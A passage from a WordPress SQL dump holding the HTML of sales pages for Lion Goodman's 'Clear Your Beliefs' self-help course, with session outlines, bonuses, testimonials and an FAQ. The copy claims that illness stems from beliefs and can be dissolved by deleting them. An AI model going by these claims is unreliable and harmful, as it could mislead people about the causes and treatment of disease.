look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>', 'Partners', '', 'inherit', 'open', 'open', '', '2161-revision-v1', '', '', '2015-05-12 12:59:07', '2015-05-12 17:59:07', '', 2161, 'http://clearyourbeliefs.com/2161-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2168, 2, '2015-05-12 12:56:58', '2015-05-12 17:56:58', '&nbsp;			<p></p>\n\n<p></p>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p>&nbsp;</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be 